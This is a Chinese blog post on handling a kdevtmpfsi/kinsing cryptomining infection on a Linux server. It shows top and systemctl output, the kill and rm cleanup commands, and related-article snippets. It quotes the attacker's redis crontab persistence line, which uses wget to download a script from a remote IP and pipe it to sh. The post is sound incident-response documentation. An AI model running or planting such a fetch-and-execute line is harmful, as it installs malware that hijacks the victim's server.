[服务器异常] kdevtmpfsi 进程

最新推荐文章于 2024-02-20 14:29:00 发布
最新推荐文章于 2024-02-20 14:29:00 发布
阅读量476 收藏 6
点赞数 9
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyp946/article/details/135580204
版权

今天突然收到了服务器的报警信息,登录服务器通过 top 检查发现一个不认识的进程占用了大量的 CPU

[root@VM_5_22_centos cron]# top
top - 11:10:29 up 139 days,  2:54,  1 user,  load average: 2.23, 2.19, 2.23
Tasks: 198 total,   1 running, 197 sleeping,   0 stopped,   0 zombie
%Cpu(s):100.0 us,  0.0 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem :  3880224 total,   138612 free,  2735260 used,  1006352 buff/cache
KiB Swap:  1048572 total,   899580 free,   148992 used.   903404 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                                                                                                                           
10237 redis     20   0 2721444   2.3g    980 S 193.8 61.8  11:35.54 kdevtmpfsi

起初的操作就是直接 kill 掉,但是 kill 掉后进程又自动启动,能自动启动应该有一个启动脚本在处理,先处理进程问题

[root@VM_5_22_centos cron]# systemctl status 10237
● session-351642.scope - Session 351642 of user redis
   Loaded: loaded (/run/systemd/system/session-351642.scope; static; vendor preset: disabled)
  Drop-In: /run/systemd/system/session-351642.scope.d
           └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
   Active: active (abandoned) since Fri 2020-11-13 09:24:02 CST; 2 weeks 4 days ago
   CGroup: /user.slice/user-1002.slice/session-351642.scope
           ├─ 5906 /var/tmp/kinsing
           └─10237 /tmp/kdevtmpfsi

通过 systemct 找出这个进程相关信息,直接 kill 掉 5906 10237,同时删除文件

kill -9 5906
kill -9 10237
rm /var/tmp/kinsing -rf
rm /tmp/kedevtmpfsi -rf

这个进程的启动是通过 redis,那么需要检查 redis 用的 cron,直接查看 /var/spool/cron 目录下的文件

[root@VM_5_22_centos cron]# cat redis 
* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

清空 redis 文件,完成异常处理

袁跃平
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
服务器异常测试kdevtmpfsi.rar
12-31
服务器kdevtmpfsi测试版和处理方法 CPU 会大于100%
进程并发服务器实现
04-04
本示例将探讨如何在Linux环境下利用多进程并发技术实现一个聊天服务器。这个话题涵盖了Linux操作系统、多进程编程以及Socket套接字通信等多个核心知识点。 首先,我们要了解Linux操作系统。Linux是一种开源、免费的...
根治Linux服务器中病毒kdevtmpfsi挖矿病毒解决方法
weixin_42901282的博客
04-20 147
【代码】【无标题】
Linux中进程和计划任务管理
白雪滑落树梢
08-17 2216
文章目录前言一、程序和进程的关系1.程序2.进程二、查看进程信息1. ps命令1.1 查看静态的进程统计信息1.1.1 STAT常见状态的含义1.2 查看静态的进程统计信息2.top命令2.1 查看动态的进程排名信息2.1.2 top 命令全屏操作界面快捷键:3.pgrep命令4.pstree命令三、进程的启动方式1.手工启动2.调度启动3.进程的前后台调度3.1 Ctrl+z 组合键3.2 jobs命令3.3 fg和bg命令四、终止进程的运行1. Ctrl+c组合键2. kill、killall命令2..
挖矿病毒kdevtmpfsi,kinsing进程隐藏解决
张火火博客
05-31 1858
挖矿病毒kdevtmpfsi,kinsing进程隐藏解决
20181128linux进程简介
weixin_34245082的博客
11-28 118
linux进程简介 一.什么是进程进程是已启动的可执行程序的运行实例,进程有以下组成部分: 已分配内存的地址空间 安全属性,包括所有权凭据和特权 程序代码的一个或多个执行线程 进程状态程序:二进制文件,静态/bin/date,/usr/sbin/httpd ,/usr/sbin/sshd,/usr/local/nginx/sbin/ngix进程:是程序运行的过程,动态,有生命周期及运行状态二....
Linux——kdevtmpfsi(挖矿)进程解决方法与解决过程
Hern(宋兆恒)
03-23 9847
问题 CPU堵塞(100%)。我这里的主进程是YDService,你的可能和我的不一致。 原因 服务器密码被别人知道 防火墙设置问题 …… 解决方法 1、查看进程,记录下占用CPU的进程PID(包括挖矿主进程PID)命令: top 或 ps aux | less 2、查看异常链接(有助于发现问题缘由),命令: netstat -natp 或 netstat -n...
kdevtmpfsi 处理(挖矿病毒清除)
Ancoda的博客
04-26 7773
kdevtmpfsi 是一个挖矿病毒,大多数都是 redis 程序侵入,其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意module,之后在目标机器上加载此恶意module并执行恶意指令。普遍比较明显的就是 占用高额的CPU、内存资源,而且受害者还不少。
windows 服务器性能监控进程dump收集
02-03
2. **自定义周期收集指定进程dump文件**:当服务器出现异常时,dump文件是分析问题的关键。Dump文件包含了进程在特定时刻的内存快照,可以用于后续的调试和故障排查。通过设置计划任务或使用专门的工具(如Procdump ...
进程并发服务器设计
04-04
Linux环境下应用进程和Socket套接字设计并发服务器,完成多用户聊天应用程序,本文档给出了系统设计模型、进程通信接口。
Java实现Linux下服务器程序的双守护进程
12-22
 大多数的解决方法是使用其他进程来守护服务器程序,如果服务器程序挂了,通过守护进程来启动服务器程序。  万一守护进程挂了呢?使用双守护来提高稳定性,守护A负责监控服务器程序与守护B,守护B负责监控守护A...
linux服务器 kdevtmpfsi solrd 病毒处理 记住一定要多删除几次。重启
最新发布
Super_man54188的博客
02-20 1141
所有中病毒 无非是cpu内存占用高 一定要断公网地址 修改root密码 删除history历史记录 history -c 映射端口也要注意 solrd病毒 公司服务器负载突然上来了,用top命令查看,发现了一个很诡异的进程 然后grep这个进程进程号,发现是运行在/tmp/.solr/solrd下;于是赶紧杀进程,删程序,负载就下来了;但是还没有完,用top命令再次查看的时候惊...
kdevtmpfsi挖矿病毒中招与破解
永远sayYES的博客
09-18 3065
一、背景 1. 本人是一名程序员,主要负责后端开发,已经做了10多年程序员了。 2. 本人有一台ECS服务器,在腾讯云上双11买的,2C4G + 5M带宽三年话费1000不到。 3. 平时自己喜欢在上面搭建一些服务玩玩。 二、发现 有一天我在上面安装了hadoop玩,需要创建一个hadoop账号,并且给用户hadoop创建了一个简单的密码hadoop123(我真的是太懒了),同时开放了22端口的ssh服务(HDFS免密登录需要),第二天发现登录ECS机器异常卡顿,敲命令也延迟的厉害。直觉告诉我应该是我电
对挖矿病毒 kdevtmpfsi 的处理办法
weixin_42329623的博客
04-02 1579
对挖矿病毒 kdevtmpfsi 的查找与处理办法
xmrig挖矿病毒导致Postgresql数据库掉线
kite99的博客
04-18 1265
xmrig挖矿病毒导致Postgresql数据库断线。清除病毒数据库工作正常。
Linux服务器成功处理kdevtmpfsi挖矿程序,亲测有效!
x-dragon8899的博客
09-04 799
通过 top 命令查看服务器,发现CPU资源使用一直处于100%的状态,原因是kdevtmpfsi进程占用了CPU,现需处理掉这个挖矿程序。发现没有 kdevtmpfsi 进程占用CPU,清理成功!服务器CPU从52%恢复为3.5%!
如何杀掉kdevtmpfsi挖矿进程
点点滴滴的博客
12-26 8428
1、top 找到挖矿程序进程号 2、systemctl status 进程号 根据上面的进程号找父程序 3、关掉Active变色字体下面的进程(4-5) 4、rm -rf /tmp/kdevtmpfsi 删除掉这个东西 5、kill -9 进程号 ps -ef|grep kinsing查询进程号 6、kill -9 top里面的主挖矿进程号 ...
Linux显示所有运行中的进程
牛栏山矿泉水
03-13 249
Linux显示所有运行中的进程 youhaidong@youhaidong-ThinkPad-Edge-E545:~$ ps aux | less USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.1 33788 3172 ? Ss ...
守护进程与网络服务器编程技术详解
服务器编程中,有不同的技术实现,如并发服务器使用子进程或线程,预先派生子进程或线程,以及使用锁机制来管理连接。" 守护进程是操作系统中的一个重要概念,特别是在网络服务器领域。它们运行在后台,不与任何...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值